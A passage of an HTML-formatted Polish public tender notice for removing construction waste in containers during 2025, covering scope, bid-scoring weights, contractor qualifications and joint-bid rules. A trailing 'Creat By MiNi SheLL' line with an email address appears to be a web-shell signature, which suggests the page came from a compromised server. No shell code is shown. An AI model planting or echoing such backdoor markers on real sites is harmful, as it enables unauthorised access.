17 09 01, 17 09 02, 17 09 03) zgodnie z Ustawą z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.).<br/><br/>Istotne informacje:<br/>TABELA PRZEWIDYWANEJ WIELKOŚCI ODBIORU ODPADÓW BUDOWLANYCH ZGROMADZONYCH W KONTENERACH (KP 5 )<br/>1.	UL. PLEBISCYTOWA 3	<br/>Odpady budowlane i rozbiórkowe (17 01 01, 17 01 02) 25 Mg (5 x 5 Mg)	Odpady zmieszane z budowy, remontów i demontażu (17 09 01, 17 09 02, 17 09 03) 10 Mg (4 x 2,5 Mg)<br/>2.	UL. LIGONIA 5A (ABK)	<br/>Odpady budowlane i rozbiórkowe (17 01 01, 17 01 02) 15 Mg (3 x 5 Mg)	<br/>Odpady zmieszane z budowy, remontów i demontażu (17 09 01, 17 09 02, 17 09 03 ) 20 Mg (8 x 2,5 Mg)<br/>3.	Ul. SKARBOWA 1A (punkt przyjęć)	<br/>Odpady budowlane i rozbiórkowe (17 01 01, 17 01 02) 15 Mg (3 x 5 Mg)	<br/>Odpady zmieszane z budowy, remontów i demontażu (17 09 01, 17 09 02, 17 09 03) 10 Mg (4 x 2,5 Mg)<br/><br/>1)	Szacunkowa ilość wywozów pełnych kontenerów: 27.<br/>2)	Przedmiot zamówienia obejmuje:<br/>a.	systematyczne opróżnianie, odbiór i wywóz odpadów z miejsca ich składowania w celu ich utylizacji;<br/>b.	odbiór i wywóz specjalistycznym taborem;<br/>c.	odstawienie opróżnianych kontenerów KP 5 na wskazane miejsce;<br/>d.	wymianę zużytych kontenerów.<br/>3)	Odpady budowlane będą gromadzone przez Zamawiającego we wskazanych kontenerach, przy czym kontenery dla wskazanych lokalizacji Wykonawca dostarczy nieodpłatnie, najpóźniej do 7 dni od zawarcia umowy. <br/>4)	Odbiory odpadów następować będą na zlecenie telefoniczne lub e-mail po wypełnieniu danego kontenera <br/>w terminie do 72 godz. od zgłoszenia Zamawiającego.<br/>5)	Kontenery, o których mowa wyżej muszą być przystosowane do wywozu nieczystości stałych o wadze około 4-5 ton, posiadać otwartą górną przestrzeń ładunkową, z możliwością otwarcia tylnych burt, muszą być spełniać polskie normy. Ponadto powinny posiadać opis i oznaczenie logo Wykonawcy.<br/>6)	Zamawiający wymaga niezwłocznego uprzątnięcia odpadów luzem, powstających w wyniku niedokładnego opróżniania, załadunku czy opóźnionego wywozu.<br/>7)	Fakt opróżnienia lub wywozu kontenera/pojemnika zostanie każdorazowo potwierdzony protokołem podpisanym przez upoważnionych pracowników Zamawiającego i Wykonawcy.<br/>8)	W przypadku konieczności wykonania dodatkowego wywozu odpadów, podstawą rozliczeń między Zamawiającym a Wykonawcą będą ceny zawarte w obowiązującym cenniku usług świadczonych przez Wykonawcę. Wykonawca po wyborze jego oferty jako najkorzystniejszej zobowiązany jest dostarczyć obowiązujący cennik usług najpóźniej w dniu zawarcia umowy.<br/>9)	Wykonawca przez cały okres realizacji umowy zobowiązany jest do posiadania aktualnej decyzji dotyczącej gospodarowania odpadami, w zakresie zbierania/odzysku/unieszkodliwiania/ wstępnego przetwarzania odpadu będącego przedmiotem zamówienia zgodnie z Ustawą z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.) oraz Ustawą z dnia 1 grudnia 2022r. Prawo ochrony środowiska (Dz. U. z 2024 r., poz. 54 z późn. zm.) .<br/>10)	Wykonawca przez cały okres realizacji umowy zobowiązany jest do posiadania wpisu do Bazy Danych <br/>o Produktach i Opakowaniach oraz Gospodarce Odpadami (BDO) obejmujące swoim zakresem transport odpadów będących przedmiotem zamówienia.<br/>11)	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, <br/>w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Dopuszcza się również wykazanie tej równoważności normami równoważnymi w stosunku do tych wskazanych w OPZ. Na Wykonawcy spoczywa ciężar wskazania „równoważności”. Przy doborze materiałów równoważnych Wykonawca zobowiązany jest zapewnić również osiągnięcie wskaźników określonych w OPZ.<br/>12)	Ilość wywozów oraz ich częstotliwość wynikać będzie z rzeczywistych potrzeb Zamawiającego w tym zakresie. Wykonawca nie będzie rościł żadnych praw w przypadku gdy Zamawiający zleci usługi o łącznej wartości mniejszej niż określona odpowiednio do zadania.<br/>13)	Pozostałe warunki realizacji przedmiotu zamówienia określa projekt umowy stanowiący załącznik do niniejszej SWZ (druk nr 6). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenie zamówienia polegającego na powtórzeniu podobnych usług temu samemu Wykonawcy do wysokości 20% wartości zamówienia podstawowego, w okresie nie dłuższym niż 3 lata od udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>1.	Cena brutto całego zadania [PLN]	60%<br/>2.	Czas reakcji na zgłoszenie Zamawiającego [godz.]	20%<br/>3.	Czas realizacji wywozu odpadów [dni]	20%<br/><br/>Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów: <br/>1.	Cena brutto (PLN) <br/>Liczba punktów = (Cmin/Cof) * 100 * waga <br/>gdzie: <br/>•	Cmin – najniższa cena spośród wszystkich ofert <br/>•	Cof - cena podana w badanej ofercie <br/>2.	Czas reakcji na zgłoszenie Zamawiającego [godz.]<br/>Sposób przyznania punktów w kryterium: <br/>Zamawiający przyzna punkty w przedmiotowym kryterium w zależności od zaoferowanego przez Wykonawcę czasu reakcji na zgłoszenie Zamawiającego dot. przepełnionego i gotowego do odbioru kontenera, <br/>w następujący sposób: <br/>•	72 godz. – 0 pkt<br/>•	48 godz. od otrzymania zgłoszenia – 5 pkt <br/>•	36 godz. od otrzymania zgłoszenia – 10 pkt <br/>•	24 godz. od otrzymania zgłoszenia – 15 pkt<br/>•	12 godz. od otrzymania zgłoszenia – 20 pkt<br/>Termin 72 godz. czasu reakcji jest terminem maksymalnym, zgodnie z warunkiem zamawiającego. Zaproponowanie czasu dłuższego niż 72 godz. będzie stanowić niezgodność z opisem przedmiotu zamówienia i podstawę do odrzucenia oferty.<br/><br/>Wykonawca może uzyskać w tym kryterium maksymalnie 20 pkt.<br/>W przypadku niewypełnienia bądź nieprawidłowego wypełnienia (np. nieczytelnego wypełnienia lub zaznaczenia więcej niż jednej kratki) odpowiedniej pozycji w Formularzu oferty, zamawiający uzna, że wykonawca oferuje maksymalny termin podjęcia działania związanego z realizacją odbioru odpadów, określony w SWZ. Wykonawca otrzyma wówczas 0 punktów w kryterium.<br/>3.	Czas realizacji wywozu odpadów [dni]<br/>Sposób przyznania punktów w kryterium: <br/>Zamawiający przyzna punkty w przedmiotowym kryterium w zależności od zaoferowanego przez Wykonawcę czasu realizacji odbioru odpadów oraz podstawienia pustego kontenera, w następujący sposób: <br/>•	5 dni roboczych – 0 pkt <br/>•	4 dni robocze – 5 pkt<br/>•	3 dni robocze – 10 pkt<br/>•	2 dni robocze – 15 pkt<br/>•	1 dzień roboczy – 20 pkt<br/>Termin 5 dni roboczych jest terminem maksymalnym, zgodnie z warunkiem zamawiającego. Zaproponowanie czasu dłuższego będzie stanowić niezgodność z opisem przedmiotu zamówienia i podstawę do odrzucenia oferty.<br/><br/>Wykonawca może uzyskać w tym kryterium maksymalnie 20 pkt.<br/>W przypadku niewypełnienia bądź nieprawidłowego wypełnienia (np. nieczytelnego wypełnienia lub zaznaczenia więcej niż jednej kratki) odpowiedniej pozycji w Formularzu oferty, zamawiający uzna, że wykonawca oferuje maksymalny termin, określony w SWZ. Wykonawca otrzyma wówczas 0 punktów w kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenie Zamawiającego [godz.]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji wywozu odpadów [dni]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność do występowania w obrocie gospodarczym	- Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>1)	Wykonawca spełni warunek jeżeli wykaże, że posiada aktualną decyzję dotyczącą gospodarowania odpadami w zakresie zbierania/ odzysku/unieszkodliwiania/wstępnego przetwarzania odpadów będących przedmiotem zamówienia zgodnie z ustawą z dnia z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.).<br/>2)	Wykonawca spełni warunek jeżeli wykaże, że posiada wpis do Bazy Danych o Produktach i Opakowaniach oraz Gospodarce Odpadami (BDO) obejmujące swoim zakresem transport odpadów będących przedmiotem zamówienia<br/>3.	Sytuacja ekonomiczna lub finansowa	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie.<br/>4.	Zdolność techniczna i zawodowa	<br/>DOTYCZY CZĘŚCI I ZAMÓWIENIA:<br/>1)	Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował 2 pojazdami typu śmieciarka przystosowanymi do odbierania zmieszanych odpadów komunalnych, spełniających normy emisji spalin co najmniej Euro 5.<br/><br/>DOTYCZY WSZYSTKICH CZĘŚCI ZAMÓWIENIA:<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada lub będzie posiadał zaplecze techniczne dla wykonania zamówienia tj. narzędzia, wyposażenie zakładu lub urządzenia techniczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">PODMIOTOWE ŚRODKI DOWODOWE POTWIERDZAJĄCE BRAK PODSTAW DO WYKLUCZENIA WYKONAWCY /WYKONAWCÓW WYSTĘPUJĄCYCH WSPÓLNIE I PODMIOTU UDOSTĘPNIAJĄCEGO SWOJE ZASOBY WYKONAWCY, O KTÓRYCH MOWA W ART. 108 I ART. 109 ORAZ W USTAWIE Z DNIA 13.04.2022 R. O SZCZEGÓLNYCH ROZWIĄZANIACH W ZAKRESIE PRZECIWDZIAŁANIA WSPIERANIU AGRESJI NA UKRAINĘ ORAZ SŁUŻĄCYCH OCHRONIE BEZPIECZEŃSTWA NARODOWEGO<br/>Oświadczenie w celu potwierdzenia aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, <br/>o których mowa w art. 108 i art. 109 ustawy Pzp oraz w art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Oświadczenie na wezwanie Zamawiającego składa:<br/>1.	Wykonawca (druk Nr 3);<br/>2.	każdy spośród Wykonawców występujących wspólnie (druk Nr 3);<br/>3.	podmiot udostępniający zasoby Wykonawcy (druk Nr 3A).<br/>Oświadczenie należy złożyć na wezwanie Zamawiającego, gdy Wykonawca polega na zasobach podmiotu udostępniającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:	<br/>- Wykonawca spełni warunek jeżeli wykaże, że posiada aktualną decyzję dotyczącą gospodarowania odpadami w zakresie zbierania/odzysku /unieszkodliwiania/wstępnego przetwarzania odpadów będących przedmiotem zamówienia zgodnie z ustawą z dnia z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.).<br/>- Wykonawca spełni warunek jeżeli wykaże, że posiada wpis do Bazy Danych o Produktach i Opakowaniach oraz Gospodarce Odpadami (BDO) obejmujące swoim zakresem transport odpadów będących przedmiotem zamówienia.<br/>2. Wykaz pojazdów<br/>DOTYCZY CZĘŚCI I ZAMÓWIENIA:<br/>Wykaz pojazdów będących w dyspozycji Wykonawcy do realizacji zamówienia publicznego wraz z informacjami na temat podstawy do ich dysponowania</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz oferty	Formularz oferty wypełniony ściśle wg załączonego do SWZ wzoru druku, podpisany przez upełnomocnionego przedstawiciela Wykonawcy/ Wykonawców występujących wspólnie określonych aktem rejestrowym z podaniem imienia i nazwiska wraz z kompletem oświadczeń dotyczących spełnienia warunków oferty i udzielenia zamówienia.<br/>2.	KRS/CEIDG	Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. <br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa, powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w Formularzu oferty. <br/>Dotyczy także podmiotu udostępniającego zasoby. <br/>3.	Pełnomocnictwo	Pełnomocnictwo wystawione wg wzoru załączonego do niniejszej SWZ (druk Nr 4) lub pełnomocnictwa Wykonawcy. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 2 niniejszej tabeli.<br/>Dotyczy także podmiotu udostępniającego zasoby. <br/>4.	Oświadczenie o spełnieniu warunków udziału w postępowaniu	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, aktualne na dzień składania ofert. <br/>Oświadczenie składa: <br/>1.	Wykonawca (druk Nr 1);<br/>2.	każdy spośród Wykonawców występujących wspólnie (druk Nr 1) w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>3.	podmiot udostępniający zasoby Wykonawcy (druk Nr 1a) <br/>w zakresie w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>5.	Oświadczenie dotyczące przesłanek wykluczenia z postępowania	Oświadczenie Wykonawcy o braku podstaw do wykluczenia, aktualne na dzień składania ofert. <br/>Oświadczenie składa: <br/>1.	Wykonawca (druk Nr 2); <br/>2.	każdy spośród Wykonawców występujących wspólnie (druk Nr 2);<br/>3.	podmiot udostępniający zasoby Wykonawcy (druk Nr 2A). <br/>Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego.<br/>6.	Oświadczenie podmiotu trzeciego o udostępnieniu swoich zasobów Wykonawcy	Oświadczenie podmiotu trzeciego o udostępnieniu swoich zasobów w zakresie doświadczenia lub udostępnienia osób Wykonawcy <br/>w zakresie wskazanym w druku Nr 5A.<br/>Oświadczenie należy złożyć i dołączyć do oferty, gdy Wykonawca polega na zasobach podmiotu udostępniającego. <br/>7.	Oświadczenie Wykonawców występujących wspólnie	Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, z którego wynika, które czynności wykonają poszczególni Wykonawcy. <br/>Niniejsze oświadczenie składa się w formularzu oferty w pkt 11 i dotyczy tylko Wykonawców występujących wspólnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego (w tym spółki cywilne) oraz winni spełniać następujące wymagania: <br/>1.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika). <br/>2.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich <br/>w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. <br/>3.	Pełnomocnictwo powinno zawierać w szczególności:<br/>a.	nazwę postępowania o udzielenie zamówienia publicznego, którego dotyczy,<br/>b.	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy <br/>z określeniem adresu siedziby,<br/>c.	ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa.<br/>4.	Pełnomocnictwo do pełnienia takiej funkcji winno być podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców występujących wspólnie i udzielających pełnomocnictwa, natomiast w przypadku spółki cywilnej przez każdego z jej wspólników.<br/>5.	Pełnomocnictwo należy załączyć do składanej oferty w formie określonej w pkt 15 SWZ. <br/>6.	Zamawiający w okresie realizacji zamówienia nie dopuszcza możliwości zmiany pełnomocnika poza zdarzeniami losowymi niewynikającymi z działań Wykonawcy. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>7.	Oferta wspólna winna być podpisana przez ustanowionego pełnomocnika określonego w pełnomocnictwie, <br/>o którym mowa w punkcie powyżej. <br/>8.	Wszyscy Wykonawcy występują wspólnie, a w przypadku spółki cywilnej wspólnicy, będą odpowiedzialni solidarnie za wypełnienie zobowiązań umownych. Takie oświadczenie złożone przez każdego z Wykonawców/ wspólników musi być częścią omawianego wcześniej pełnomocnictwa. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o zamówienie pełnomocnictwo to będzie załączone do umowy. <br/>9.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>10.	W przypadku sformułowania przez Zamawiającego warunku dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>11.	W przypadku sformułowania przez Zamawiającego warunku dotyczącego wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <br/>12.	W przypadku, o którym mowa w pkt 9 i 10, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>13.	Dokumenty/oświadczenia dot. Wykonawców występujących wspólnie należy złożyć w formie określonej w pkt 15 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy na podstawie art. 455 ustawy Pzp. szczegółowe zasady zostały określone w PPU, stanowiących Druk nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl/Ogloszenia/Details/a9227d7c-1e52-4966-a68f-395ec8927581</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-19 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com